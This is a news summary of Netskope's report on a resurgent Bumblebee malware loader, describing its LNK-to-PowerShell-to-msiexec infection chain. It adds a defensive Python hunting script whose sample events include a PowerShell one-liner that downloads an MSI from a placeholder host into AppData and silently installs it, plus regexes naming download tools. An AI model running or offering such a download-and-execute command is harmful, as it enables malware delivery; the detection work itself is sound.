"Netskope Reports Possible Bumblebee Loader Resurgence"

According to security researchers at Netskope, the Bumblebee malware loader may have re-emerged months after the Europol-led Operation Endgame disrupted it in May 2024. The researchers uncovered a new infection chain that deploys Bumblebee and noted that it is the first Bumblebee campaign they have observed since Operation Endgame, a law enforcement action by Europol and partners that disrupted major malware botnets. Bumblebee is a sophisticated loader that cybercriminal groups have actively used to distribute ransomware, infostealers, and other malicious payloads.

The new infection chain likely starts with a phishing email that lures the victim into downloading a ZIP file, extracting it, and running the file inside. The ZIP contains an LNK file named "Report-41952.lnk". Once opened, the LNK file runs a PowerShell command that downloads a Microsoft Installer (MSI) file from a remote server, saves it as "%AppData%\y.msi", and then installs it with the Microsoft msiexec.exe tool. That chain ends with the final Bumblebee payload being downloaded and executed in memory, avoiding the need to write the DLL to disk, as observed in previous campaigns.
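The delivery chain described above (LNK launched from the user's shell, a PowerShell one-liner that fetches an MSI into %AppData%, then msiexec.exe installing it) is visible in ordinary process-creation telemetry. The following is an added hunting example, not code from Netskope's report or from Infosecurity Magazine: it walks parent/child relationships and flags both the PowerShell download-then-msiexec command line and msiexec installing an .msi from AppData with a PowerShell parent. The event field names (pid, ppid, image, cmdline) are assumed to mirror Sysmon Event ID 1, and every sample event, including the 198.51.100.7 placeholder download server, is constructed for the demo.

```python
"""Hunt for the LNK -> PowerShell -> msiexec delivery chain in process-creation
telemetry. Added example, not code from Netskope or the article; the event
fields (pid, ppid, image, cmdline) mirror Sysmon Event ID 1 and are an
assumption, and every sample event below is constructed for this demo."""
import re
from typing import Dict, List

Event = Dict[str, str]

# Constructed sample telemetry (not real logs). 198.51.100.7 is a documentation
# address used here as a placeholder download server.
SAMPLE_EVENTS: List[Event] = [
    {"pid": "4120", "ppid": "1200", "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # explorer launches PowerShell via the LNK; note the AppData staging path
    {"pid": "5332", "ppid": "4120",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr http://198.51.100.7/x '
                '-OutFile $env:APPDATA\\y.msi; msiexec /i $env:APPDATA\\y.msi /qn"'},
    {"pid": "5340", "ppid": "5332", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\alice\AppData\Roaming\y.msi /qn"},
    # benign admin install from a managed location: must not fire
    {"pid": "6001", "ppid": "900", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\ProgramData\Installers\7zip.msi /qn"},
]

# An .msi staged under the user's AppData, written as %AppData%, $env:APPDATA
# or the expanded ...\AppData\Roaming|Local\ path.
APPDATA_MSI_RE = re.compile(
    r"(%appdata%|\$env:appdata|\\appdata\\(roaming|local)\\)[^\s\"']*\.msi", re.I)
# Common PowerShell download primitives.
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|"
    r"net\.webclient|\bcurl\b|\bwget\b)", re.I)
MSIEXEC_RE = re.compile(r"\bmsiexec(\.exe)?\b", re.I)
SHELLS = ("powershell.exe", "pwsh.exe")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def index_by_pid(events: List[Event]) -> Dict[str, Event]:
    return {e["pid"]: e for e in events}


def ancestry(by_pid: Dict[str, Event], pid: str, max_depth: int = 5) -> List[str]:
    """Image basenames from pid upward: [child, parent, grandparent, ...]."""
    chain: List[str] = []
    cur = by_pid.get(pid)
    while cur is not None and len(chain) < max_depth:
        chain.append(basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return chain


def find_suspicious(events: List[Event]) -> List[Dict[str, str]]:
    """Two rules keyed on behaviour rather than the 'y.msi' name, which an
    operator can change at will:
      1. msiexec installing an .msi from AppData with a PowerShell parent;
      2. a single PowerShell command line that both downloads and calls msiexec."""
    by_pid = index_by_pid(events)
    hits: List[Dict[str, str]] = []
    for e in events:
        img, cmd = basename(e["image"]), e["cmdline"]
        chain = ancestry(by_pid, e["pid"])
        parent = chain[1] if len(chain) > 1 else ""
        if img == "msiexec.exe" and APPDATA_MSI_RE.search(cmd) and parent in SHELLS:
            hits.append({"pid": e["pid"], "rule": "msiexec_appdata_msi_from_powershell",
                         "chain": " <- ".join(chain)})
        if img in SHELLS and DOWNLOAD_RE.search(cmd) and MSIEXEC_RE.search(cmd):
            hits.append({"pid": e["pid"], "rule": "powershell_download_then_msiexec",
                         "chain": " <- ".join(chain)})
    return hits


if __name__ == "__main__":
    for h in find_suspicious(SAMPLE_EVENTS):
        print(f"[{h['rule']}] pid={h['pid']} chain: {h['chain']}")
```

Running the block against the constructed events reports the PowerShell one-liner and the msiexec child (whose reported chain is msiexec.exe <- powershell.exe <- explorer.exe, consistent with a double-clicked LNK) while leaving the ProgramData install alone. The rules deliberately key on the staging location and the parent process rather than the "y.msi" filename from the report, since a renamed file would otherwise evade a name-based signature; the explorer.exe grandparent is reported for context rather than required, because other shells can also launch an LNK.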

Infosecurity Magazine reports: "Netskope Reports Possible Bumblebee Loader Resurgence"

Submitted by Adam Ekwall on